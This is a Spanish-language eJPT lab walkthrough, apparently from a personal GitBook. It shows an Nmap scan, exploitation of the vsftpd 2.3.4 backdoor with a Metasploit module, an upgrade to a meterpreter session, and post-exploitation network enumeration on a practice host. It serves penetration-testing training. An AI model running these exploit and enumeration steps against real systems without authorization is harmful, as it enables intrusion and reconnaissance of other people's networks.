> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/enumeracion-de-linux/enumeracion-de-informacion-de-red-linux.md).

# Enumeración de información de red - Linux

## 🧪 Laboratorio Práctico

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/RI8CgDIu1DtFXkiAlxgI" alt=""><figcaption></figcaption></figure>

**Paso 2:** Escaneo de puertos con Nmap.

Realice un escaneo de puertos para identificar los servicios vulnerables que se ejecutan en el sistema objetivo. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
nmap -sV demo.ine.local
```

<figure><img src="/files/1bjk5BLYM6goSfnJ4JO0" alt=""><figcaption></figcaption></figure>

El análisis de Nmap revela que el objetivo tiene un servidor FTP ejecutándose en el puerto 21. La columna de versión del análisis de Nmap revela que el servidor FTP es vsftpd 2.3.4. Esta versión de vsftpd es vulnerable a una vulnerabilidad de ejecución de comandos de puerta trasera y puede explotarse con un módulo de Metasploit.

**Paso 3:** Obtener acceso.

Ahora que hemos identificado el servicio vulnerable que se ejecuta en el objetivo, podemos iniciar la consola de Metasploit Framework (msfconsole) y ejecutar el módulo de explotación ejecutando el siguiente comando:

**Dominio:**

```
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS demo.ine.local
exploit
id
```

**Nota:** Si el exploit no funcionó en el primer intento, ejecútelo nuevamente.

<figure><img src="/files/TS194ifw3xIUPpcJQTxW" alt=""><figcaption></figcaption></figure>

También puede obtener una sesión de meterpreter en el sistema de destino actualizando la sesión del shell de comandos. Para ello, ejecute los siguientes comandos:

(Poner la sesión actual en segundo plano.)

**Comandos:**

```
CTRL + Z
sessions -u 1
sessions
sessions -i 2
```

<figure><img src="/files/C25DEmV23JUb4jRtYpG0" alt=""><figcaption></figcaption></figure>

**Paso 4:** Enumerar la información de la red.

Ahora que hemos obtenido acceso al sistema de destino y hemos obtenido una sesión de meterpreter, podemos comenzar a enumerar la información de la red del sistema de destino.

El primer dato que podemos enumerar es la lista de interfaces de red conectadas al sistema objetivo y sus respectivas direcciones IP, esto se puede hacer ejecutando el siguiente comando meterpreter:

**Dominio:**

```
ifconfig
```

Como se muestra en la siguiente captura de pantalla, el sistema de destino tiene una interfaz física (eth0), una interfaz de bucle invertido (lo) para conexiones locales y una interfaz virtual (ip\_vti0).

<figure><img src="/files/kvD38RZVaBPJ3W2kwXLP" alt=""><figcaption></figcaption></figure>

Podemos obtener una lista de puertos abiertos en el sistema de destino ejecutando el siguiente comando meterpreter:

**Dominio:**

```
netstat
```

<figure><img src="/files/HkwevW5euf7f1OiRduCf" alt=""><figcaption></figcaption></figure>

Otro dato importante a obtener es la tabla de enrutamiento, esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
route
```

<figure><img src="/files/DXQcyZT6b4rfAovm7KNN" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, esto le dará una idea de todas las rutas disponibles.

Esta información también se puede recopilar manualmente iniciando una sesión de shell y ejecutando los siguientes comandos:

**Dominio:**

```
background
sessions -i 1
/bin/bash -i
ip a s
```

<figure><img src="/files/ZmC71EgXUlxfy7Fyo6cR" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, este comando mostrará la lista de interfaces de red conectadas al sistema de destino.

También podemos enumerar la lista de redes configuradas y sus subredes ejecutando el siguiente comando:

**Dominio:**

```
cat /etc/networks
```

<figure><img src="/files/JLLDll6FN0jOm7kZtReB" alt=""><figcaption></figcaption></figure>

Lo más importante es que podemos enumerar la lista de dominios mapeados localmente y sus respectivas direcciones IP mostrando el contenido del archivo /etc/hosts.

**Dominio:**

```
cat /etc/hosts
```

<figure><img src="/files/e5hmNtEenVKcjaXl9cvC" alt=""><figcaption></figcaption></figure>

Para identificar la dirección del servidor de nombres DNS predeterminado, podemos ejecutar el siguiente comando:

**Dominio:**

```
cat /etc/resolv.conf
```

<figure><img src="/files/PCoy3oXEmgXTMMyeMsx1" alt=""><figcaption></figcaption></figure>

#### Conclusión

En este laboratorio, aprendimos sobre el proceso de enumeración de información de red desde un sistema de destino que ejecuta Linux.
